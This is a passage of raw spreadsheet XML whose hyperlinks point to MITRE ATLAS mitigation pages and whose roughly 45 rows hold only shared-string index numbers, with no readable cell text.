Target="https://atlas.mitre.org/mitigations/AML.M0004" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0011" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0002" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0003" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0025" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0000" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0001" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0010" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0022" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0021" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M00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6"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="16.6666666666667" style="38" customWidth="1"/>
    <col min="2" max="2" width="65.6666666666667" style="38" customWidth="1"/>
    <col min="3" max="3" width="44.4444444444444" style="38" customWidth="1"/>
    <col min="4" max="4" width="131.888888888889" style="39" customWidth="1"/>
    <col min="5" max="5" width="51.3333333333333" style="39" customWidth="1"/>
    <col min="6" max="6" width="15.4444444444444" style="38" customWidth="1"/>
    <col min="7" max="7" width="15.8888888888889" style="38" customWidth="1"/>
    <col min="8" max="8" width="37" style="38" customWidth="1"/>
    <col min="9" max="9" width="10.4444444444444" style="38" customWidth="1"/>
    <col min="10" max="16384" width="9" style="38"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9">
      <c r="A1" s="29" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="29" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="29" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="35" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="35" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="29" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="29" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="29" t="s">
        <v>7</v>
      </c>
      <c r="I1" s="29" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="2" ht="30" spans="1:9">
      <c r="A2" s="32" t="s">
        <v>9</v>
      </c>
      <c r="B2" s="32" t="s">
        <v>10</v>
      </c>
      <c r="C2" s="32" t="s">
        <v>11</v>
      </c>
      <c r="D2" s="36" t="s">
        <v>12</v>
      </c>
      <c r="E2" s="37" t="s">
        <v>13</v>
      </c>
      <c r="F2" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G2" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H2" s="32" t="s">
        <v>15</v>
      </c>
      <c r="I2" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="3" ht="75" spans="1:9">
      <c r="A3" s="32" t="s">
        <v>17</v>
      </c>
      <c r="B3" s="32" t="s">
        <v>18</v>
      </c>
      <c r="C3" s="32" t="s">
        <v>19</v>
      </c>
      <c r="D3" s="36" t="s">
        <v>20</v>
      </c>
      <c r="E3" s="37" t="s">
        <v>21</v>
      </c>
      <c r="F3" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G3" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H3" s="32" t="s">
        <v>22</v>
      </c>
      <c r="I3" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="4" ht="105" spans="1:9">
      <c r="A4" s="32" t="s">
        <v>23</v>
      </c>
      <c r="B4" s="32" t="s">
        <v>24</v>
      </c>
      <c r="C4" s="32" t="s">
        <v>25</v>
      </c>
      <c r="D4" s="36" t="s">
        <v>26</v>
      </c>
      <c r="E4" s="37" t="s">
        <v>27</v>
      </c>
      <c r="F4" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G4" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H4" s="32" t="s">
        <v>28</v>
      </c>
      <c r="I4" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="5" ht="135" spans="1:9">
      <c r="A5" s="32" t="s">
        <v>29</v>
      </c>
      <c r="B5" s="32" t="s">
        <v>30</v>
      </c>
      <c r="C5" s="32" t="s">
        <v>31</v>
      </c>
      <c r="D5" s="36" t="s">
        <v>32</v>
      </c>
      <c r="E5" s="37" t="s">
        <v>33</v>
      </c>
      <c r="F5" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G5" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H5" s="32" t="s">
        <v>34</v>
      </c>
      <c r="I5" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="6" ht="60" spans="1:9">
      <c r="A6" s="32" t="s">
        <v>35</v>
      </c>
      <c r="B6" s="32" t="s">
        <v>36</v>
      </c>
      <c r="C6" s="32" t="s">
        <v>37</v>
      </c>
      <c r="D6" s="36" t="s">
        <v>38</v>
      </c>
      <c r="E6" s="37" t="s">
        <v>39</v>
      </c>
      <c r="F6" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G6" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H6" s="32" t="s">
        <v>40</v>
      </c>
      <c r="I6" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="7" ht="75" spans="1:9">
      <c r="A7" s="32" t="s">
        <v>41</v>
      </c>
      <c r="B7" s="32" t="s">
        <v>42</v>
      </c>
      <c r="C7" s="32" t="s">
        <v>43</v>
      </c>
      <c r="D7" s="36" t="s">
        <v>44</v>
      </c>
      <c r="E7" s="37" t="s">
        <v>45</v>
      </c>
      <c r="F7" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G7" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H7" s="32" t="s">
        <v>40</v>
      </c>
      <c r="I7" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="8" ht="30" spans="1:9">
      <c r="A8" s="32" t="s">
        <v>46</v>
      </c>
      <c r="B8" s="32" t="s">
        <v>47</v>
      </c>
      <c r="C8" s="32" t="s">
        <v>48</v>
      </c>
      <c r="D8" s="36" t="s">
        <v>49</v>
      </c>
      <c r="E8" s="37" t="s">
        <v>50</v>
      </c>
      <c r="F8" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G8" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H8" s="32" t="s">
        <v>34</v>
      </c>
      <c r="I8" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="9" ht="165" spans="1:9">
      <c r="A9" s="32" t="s">
        <v>51</v>
      </c>
      <c r="B9" s="32" t="s">
        <v>52</v>
      </c>
      <c r="C9" s="32" t="s">
        <v>53</v>
      </c>
      <c r="D9" s="36" t="s">
        <v>54</v>
      </c>
      <c r="E9" s="37" t="s">
        <v>55</v>
      </c>
      <c r="F9" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G9" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H9" s="32" t="s">
        <v>22</v>
      </c>
      <c r="I9" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="10" ht="270" spans="1:9">
      <c r="A10" s="32" t="s">
        <v>56</v>
      </c>
      <c r="B10" s="32" t="s">
        <v>57</v>
      </c>
      <c r="C10" s="32" t="s">
        <v>58</v>
      </c>
      <c r="D10" s="36" t="s">
        <v>59</v>
      </c>
      <c r="E10" s="37" t="s">
        <v>60</v>
      </c>
      <c r="F10" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G10" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H10" s="32" t="s">
        <v>22</v>
      </c>
      <c r="I10" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="11" ht="45" spans="1:9">
      <c r="A11" s="32" t="s">
        <v>61</v>
      </c>
      <c r="B11" s="32" t="s">
        <v>62</v>
      </c>
      <c r="C11" s="32" t="s">
        <v>63</v>
      </c>
      <c r="D11" s="36" t="s">
        <v>64</v>
      </c>
      <c r="E11" s="37" t="s">
        <v>65</v>
      </c>
      <c r="F11" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G11" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H11" s="32" t="s">
        <v>66</v>
      </c>
      <c r="I11" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="12" ht="60" spans="1:9">
      <c r="A12" s="32" t="s">
        <v>67</v>
      </c>
      <c r="B12" s="32" t="s">
        <v>68</v>
      </c>
      <c r="C12" s="32" t="s">
        <v>69</v>
      </c>
      <c r="D12" s="36" t="s">
        <v>70</v>
      </c>
      <c r="E12" s="37" t="s">
        <v>71</v>
      </c>
      <c r="F12" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G12" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H12" s="32" t="s">
        <v>22</v>
      </c>
      <c r="I12" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="13" ht="60" spans="1:9">
      <c r="A13" s="32" t="s">
        <v>72</v>
      </c>
      <c r="B13" s="32" t="s">
        <v>73</v>
      </c>
      <c r="C13" s="32" t="s">
        <v>74</v>
      </c>
      <c r="D13" s="36" t="s">
        <v>75</v>
      </c>
      <c r="E13" s="37" t="s">
        <v>76</v>
      </c>
      <c r="F13" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G13" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H13" s="32" t="s">
        <v>22</v>
      </c>
      <c r="I13" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="14" ht="90" spans="1:9">
      <c r="A14" s="32" t="s">
        <v>77</v>
      </c>
      <c r="B14" s="32" t="s">
        <v>78</v>
      </c>
      <c r="C14" s="32" t="s">
        <v>79</v>
      </c>
      <c r="D14" s="36" t="s">
        <v>80</v>
      </c>
      <c r="E14" s="37" t="s">
        <v>81</v>
      </c>
      <c r="F14" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G14" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H14" s="32" t="s">
        <v>82</v>
      </c>
      <c r="I14" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="15" ht="135" spans="1:9">
      <c r="A15" s="32" t="s">
        <v>83</v>
      </c>
      <c r="B15" s="32" t="s">
        <v>84</v>
      </c>
      <c r="C15" s="32" t="s">
        <v>85</v>
      </c>
      <c r="D15" s="36" t="s">
        <v>86</v>
      </c>
      <c r="E15" s="37" t="s">
        <v>87</v>
      </c>
      <c r="F15" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G15" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H15" s="32" t="s">
        <v>82</v>
      </c>
      <c r="I15" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="16" ht="30" spans="1:9">
      <c r="A16" s="32" t="s">
        <v>88</v>
      </c>
      <c r="B16" s="32" t="s">
        <v>89</v>
      </c>
      <c r="C16" s="32" t="s">
        <v>90</v>
      </c>
      <c r="D16" s="36" t="s">
        <v>91</v>
      </c>
      <c r="E16" s="37" t="s">
        <v>92</v>
      </c>
      <c r="F16" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G16" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H16" s="32" t="s">
        <v>93</v>
      </c>
      <c r="I16" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="17" ht="225" spans="1:9">
      <c r="A17" s="32" t="s">
        <v>94</v>
      </c>
      <c r="B17" s="32" t="s">
        <v>95</v>
      </c>
      <c r="C17" s="32" t="s">
        <v>96</v>
      </c>
      <c r="D17" s="36" t="s">
        <v>97</v>
      </c>
      <c r="E17" s="37" t="s">
        <v>98</v>
      </c>
      <c r="F17" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G17" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H17" s="32" t="s">
        <v>99</v>
      </c>
      <c r="I17" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="18" ht="195" spans="1:9">
      <c r="A18" s="32" t="s">
        <v>100</v>
      </c>
      <c r="B18" s="32" t="s">
        <v>101</v>
      </c>
      <c r="C18" s="32" t="s">
        <v>102</v>
      </c>
      <c r="D18" s="36" t="s">
        <v>103</v>
      </c>
      <c r="E18" s="37" t="s">
        <v>104</v>
      </c>
      <c r="F18" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G18" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H18" s="32" t="s">
        <v>105</v>
      </c>
      <c r="I18" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="19" ht="45" spans="1:9">
      <c r="A19" s="32" t="s">
        <v>106</v>
      </c>
      <c r="B19" s="32" t="s">
        <v>107</v>
      </c>
      <c r="C19" s="32" t="s">
        <v>108</v>
      </c>
      <c r="D19" s="36" t="s">
        <v>109</v>
      </c>
      <c r="E19" s="37" t="s">
        <v>110</v>
      </c>
      <c r="F19" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G19" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H19" s="32" t="s">
        <v>22</v>
      </c>
      <c r="I19" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="20" ht="90" spans="1:9">
      <c r="A20" s="32" t="s">
        <v>111</v>
      </c>
      <c r="B20" s="32" t="s">
        <v>112</v>
      </c>
      <c r="C20" s="32" t="s">
        <v>113</v>
      </c>
      <c r="D20" s="36" t="s">
        <v>114</v>
      </c>
      <c r="E20" s="37" t="s">
        <v>115</v>
      </c>
      <c r="F20" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G20" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H20" s="32" t="s">
        <v>93</v>
      </c>
      <c r="I20" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="21" ht="30" spans="1:9">
      <c r="A21" s="32" t="s">
        <v>116</v>
      </c>
      <c r="B21" s="32" t="s">
        <v>117</v>
      </c>
      <c r="C21" s="32" t="s">
        <v>118</v>
      </c>
      <c r="D21" s="36" t="s">
        <v>119</v>
      </c>
      <c r="E21" s="37" t="s">
        <v>120</v>
      </c>
      <c r="F21" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G21" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H21" s="32" t="s">
        <v>93</v>
      </c>
      <c r="I21" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="22" ht="45" spans="1:9">
      <c r="A22" s="32" t="s">
        <v>121</v>
      </c>
      <c r="B22" s="32" t="s">
        <v>122</v>
      </c>
      <c r="C22" s="32" t="s">
        <v>123</v>
      </c>
      <c r="D22" s="36" t="s">
        <v>124</v>
      </c>
      <c r="E22" s="37" t="s">
        <v>125</v>
      </c>
      <c r="F22" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G22" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H22" s="32" t="s">
        <v>28</v>
      </c>
      <c r="I22" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="23" ht="285" spans="1:9">
      <c r="A23" s="32" t="s">
        <v>126</v>
      </c>
      <c r="B23" s="32" t="s">
        <v>127</v>
      </c>
      <c r="C23" s="32" t="s">
        <v>128</v>
      </c>
      <c r="D23" s="36" t="s">
        <v>129</v>
      </c>
      <c r="E23" s="37" t="s">
        <v>130</v>
      </c>
      <c r="F23" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G23" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H23" s="32" t="s">
        <v>82</v>
      </c>
      <c r="I23" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="24" ht="90" spans="1:9">
      <c r="A24" s="32" t="s">
        <v>131</v>
      </c>
      <c r="B24" s="32" t="s">
        <v>132</v>
      </c>
      <c r="C24" s="32" t="s">
        <v>133</v>
      </c>
      <c r="D24" s="36" t="s">
        <v>134</v>
      </c>
      <c r="E24" s="37" t="s">
        <v>135</v>
      </c>
      <c r="F24" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G24" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H24" s="32" t="s">
        <v>82</v>
      </c>
      <c r="I24" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="25" ht="135" spans="1:9">
      <c r="A25" s="32" t="s">
        <v>136</v>
      </c>
      <c r="B25" s="32" t="s">
        <v>137</v>
      </c>
      <c r="C25" s="32" t="s">
        <v>138</v>
      </c>
      <c r="D25" s="36" t="s">
        <v>139</v>
      </c>
      <c r="E25" s="37" t="s">
        <v>140</v>
      </c>
      <c r="F25" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G25" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H25" s="32" t="s">
        <v>40</v>
      </c>
      <c r="I25" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="26" ht="120" spans="1:9">
      <c r="A26" s="32" t="s">
        <v>141</v>
      </c>
      <c r="B26" s="32" t="s">
        <v>142</v>
      </c>
      <c r="C26" s="32" t="s">
        <v>143</v>
      </c>
      <c r="D26" s="36" t="s">
        <v>144</v>
      </c>
      <c r="E26" s="37" t="s">
        <v>145</v>
      </c>
      <c r="F26" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G26" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H26" s="32" t="s">
        <v>15</v>
      </c>
      <c r="I26" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="27" ht="75" spans="1:9">
      <c r="A27" s="32" t="s">
        <v>146</v>
      </c>
      <c r="B27" s="32" t="s">
        <v>147</v>
      </c>
      <c r="C27" s="32" t="s">
        <v>148</v>
      </c>
      <c r="D27" s="36" t="s">
        <v>149</v>
      </c>
      <c r="E27" s="37" t="s">
        <v>150</v>
      </c>
      <c r="F27" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G27" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H27" s="32" t="s">
        <v>15</v>
      </c>
      <c r="I27" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="28" ht="120" spans="1:9">
      <c r="A28" s="32" t="s">
        <v>151</v>
      </c>
      <c r="B28" s="32" t="s">
        <v>152</v>
      </c>
      <c r="C28" s="32" t="s">
        <v>153</v>
      </c>
      <c r="D28" s="36" t="s">
        <v>154</v>
      </c>
      <c r="E28" s="37" t="s">
        <v>155</v>
      </c>
      <c r="F28" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G28" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H28" s="32" t="s">
        <v>22</v>
      </c>
      <c r="I28" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="29" ht="60" spans="1:9">
      <c r="A29" s="32" t="s">
        <v>156</v>
      </c>
      <c r="B29" s="32" t="s">
        <v>157</v>
      </c>
      <c r="C29" s="32" t="s">
        <v>158</v>
      </c>
      <c r="D29" s="36" t="s">
        <v>159</v>
      </c>
      <c r="E29" s="37" t="s">
        <v>160</v>
      </c>
      <c r="F29" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G29" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H29" s="32" t="s">
        <v>28</v>
      </c>
      <c r="I29" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="30" ht="60" spans="1:9">
      <c r="A30" s="32" t="s">
        <v>161</v>
      </c>
      <c r="B30" s="32" t="s">
        <v>162</v>
      </c>
      <c r="C30" s="32" t="s">
        <v>163</v>
      </c>
      <c r="D30" s="36" t="s">
        <v>164</v>
      </c>
      <c r="E30" s="37" t="s">
        <v>165</v>
      </c>
      <c r="F30" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G30" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H30" s="32" t="s">
        <v>22</v>
      </c>
      <c r="I30" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="31" ht="45" spans="1:9">
      <c r="A31" s="32" t="s">
        <v>166</v>
      </c>
      <c r="B31" s="32" t="s">
        <v>167</v>
      </c>
      <c r="C31" s="32" t="s">
        <v>168</v>
      </c>
      <c r="D31" s="36" t="s">
        <v>169</v>
      </c>
      <c r="E31" s="37" t="s">
        <v>170</v>
      </c>
      <c r="F31" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G31" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H31" s="32" t="s">
        <v>105</v>
      </c>
      <c r="I31" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="32" ht="75" spans="1:9">
      <c r="A32" s="32" t="s">
        <v>171</v>
      </c>
      <c r="B32" s="32" t="s">
        <v>172</v>
      </c>
      <c r="C32" s="32" t="s">
        <v>173</v>
      </c>
      <c r="D32" s="36" t="s">
        <v>174</v>
      </c>
      <c r="E32" s="37" t="s">
        <v>175</v>
      </c>
      <c r="F32" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G32" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H32" s="32" t="s">
        <v>99</v>
      </c>
      <c r="I32" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="33" ht="90" spans="1:9">
      <c r="A33" s="32" t="s">
        <v>176</v>
      </c>
      <c r="B33" s="32" t="s">
        <v>177</v>
      </c>
      <c r="C33" s="32" t="s">
        <v>178</v>
      </c>
      <c r="D33" s="36" t="s">
        <v>179</v>
      </c>
      <c r="E33" s="37" t="s">
        <v>180</v>
      </c>
      <c r="F33" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G33" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H33" s="32" t="s">
        <v>99</v>
      </c>
      <c r="I33" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="34" ht="90" spans="1:9">
      <c r="A34" s="32" t="s">
        <v>181</v>
      </c>
      <c r="B34" s="32" t="s">
        <v>182</v>
      </c>
      <c r="C34" s="32" t="s">
        <v>183</v>
      </c>
      <c r="D34" s="36" t="s">
        <v>184</v>
      </c>
      <c r="E34" s="37" t="s">
        <v>185</v>
      </c>
      <c r="F34" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G34" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H34" s="32" t="s">
        <v>99</v>
      </c>
      <c r="I34" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="35" ht="45" spans="1:9">
      <c r="A35" s="32" t="s">
        <v>186</v>
      </c>
      <c r="B35" s="32" t="s">
        <v>187</v>
      </c>
      <c r="C35" s="32" t="s">
        <v>188</v>
      </c>
      <c r="D35" s="36" t="s">
        <v>189</v>
      </c>
      <c r="E35" s="37" t="s">
        <v>190</v>
      </c>
      <c r="F35" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G35" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H35" s="32" t="s">
        <v>99</v>
      </c>
      <c r="I35" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="36" ht="75" spans="1:9">
      <c r="A36" s="32" t="s">
        <v>191</v>
      </c>
      <c r="B36" s="32" t="s">
        <v>192</v>
      </c>
      <c r="C36" s="32" t="s">
        <v>193</v>
      </c>
      <c r="D36" s="36" t="s">
        <v>194</v>
      </c>
      <c r="E36" s="37" t="s">
        <v>195</v>
      </c>
      <c r="F36" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G36" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H36" s="32" t="s">
        <v>99</v>
      </c>
      <c r="I36" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="37" ht="75" spans="1:9">
      <c r="A37" s="32" t="s">
        <v>196</v>
      </c>
      <c r="B37" s="32" t="s">
        <v>197</v>
      </c>
      <c r="C37" s="32" t="s">
        <v>198</v>
      </c>
      <c r="D37" s="36" t="s">
        <v>199</v>
      </c>
      <c r="E37" s="37" t="s">
        <v>200</v>
      </c>
      <c r="F37" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G37" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H37" s="32" t="s">
        <v>99</v>
      </c>
      <c r="I37" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="38" ht="105" spans="1:9">
      <c r="A38" s="32" t="s">
        <v>201</v>
      </c>
      <c r="B38" s="32" t="s">
        <v>202</v>
      </c>
      <c r="C38" s="32" t="s">
        <v>203</v>
      </c>
      <c r="D38" s="36" t="s">
        <v>204</v>
      </c>
      <c r="E38" s="37" t="s">
        <v>205</v>
      </c>
      <c r="F38" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G38" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H38" s="32" t="s">
        <v>99</v>
      </c>
      <c r="I38" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="39" ht="90" spans="1:9">
      <c r="A39" s="32" t="s">
        <v>206</v>
      </c>
      <c r="B39" s="32" t="s">
        <v>207</v>
      </c>
      <c r="C39" s="32" t="s">
        <v>208</v>
      </c>
      <c r="D39" s="36" t="s">
        <v>209</v>
      </c>
      <c r="E39" s="37" t="s">
        <v>210</v>
      </c>
      <c r="F39" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G39" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H39" s="32" t="s">
        <v>40</v>
      </c>
      <c r="I39" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="40" ht="75" spans="1:9">
      <c r="A40" s="32" t="s">
        <v>211</v>
      </c>
      <c r="B40" s="32" t="s">
        <v>212</v>
      </c>
      <c r="C40" s="32" t="s">
        <v>213</v>
      </c>
      <c r="D40" s="36" t="s">
        <v>214</v>
      </c>
      <c r="E40" s="37" t="s">
        <v>215</v>
      </c>
      <c r="F40" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G40" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H40" s="32" t="s">
        <v>93</v>
      </c>
      <c r="I40" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="41" ht="60" spans="1:9">
      <c r="A41" s="32" t="s">
        <v>216</v>
      </c>
      <c r="B41" s="32" t="s">
        <v>217</v>
      </c>
      <c r="C41" s="32" t="s">
        <v>218</v>
      </c>
      <c r="D41" s="36" t="s">
        <v>219</v>
      </c>
      <c r="E41" s="37" t="s">
        <v>220</v>
      </c>
      <c r="F41" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G41" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H41" s="32" t="s">
        <v>28</v>
      </c>
      <c r="I41" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="42" ht="30" spans="1:9">
      <c r="A42" s="32" t="s">
        <v>221</v>
      </c>
      <c r="B42" s="32" t="s">
        <v>222</v>
      </c>
      <c r="C42" s="32" t="s">
        <v>223</v>
      </c>
      <c r="D42" s="36" t="s">
        <v>224</v>
      </c>
      <c r="E42" s="37" t="s">
        <v>225</v>
      </c>
      <c r="F42" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G42" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H42" s="32" t="s">
        <v>28</v>
      </c>
      <c r="I42" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="43" ht="45" spans="1:9">
      <c r="A43" s="32" t="s">
        <v>226</v>
      </c>
      <c r="B43" s="32" t="s">
        <v>227</v>
      </c>
      <c r="C43" s="32" t="s">
        <v>228</v>
      </c>
      <c r="D43" s="36" t="s">
        <v>229</v>
      </c>
      <c r="E43" s="37" t="s">
        <v>230</v>
      </c>
      <c r="F43" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G43" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H43" s="32" t="s">
        <v>22</v>
      </c>
      <c r="I43" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="44" ht="60" spans="1:9">
      <c r="A44" s="32" t="s">
        <v>231</v>
      </c>
      <c r="B44" s="32" t="s">
        <v>232</v>
      </c>
      <c r="C44" s="32" t="s">
        <v>233</v>
      </c>
      <c r="D44" s="36" t="s">
        <v>234</v>
      </c>
      <c r="E44" s="37" t="s">
        <v>235</v>
      </c>
      <c r="F44" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G44" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H44" s="32" t="s">
        <v>236</v>
      </c>
      <c r="I44" s="32" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="45" ht="120" spans="1:9">
      <c r="A45" s="32" t="s">
        <v>237</v>
      </c>
      <c r="B45" s="32" t="s">
        <v>238</v>
      </c>
      <c r="C45" s="32" t="s">
        <v>239</v>
      </c>
      <c r="D45" s="36" t="s">
        <v>240</v>
      </c>
      <c r="E45" s="37" t="s">
        <v>241</v>
      </c>
      <c r="F45" s="32" t="s">
        <v>14</v>
      </c>
      <c r="G45" s="32" t="s">
        <v>14</v>
      </c>
      <c r="H45" s="32" t="s">
        <v>242</v>
      </c>
      <c r="I45" s="32" t="s">
        <v>16</v>
      </c>
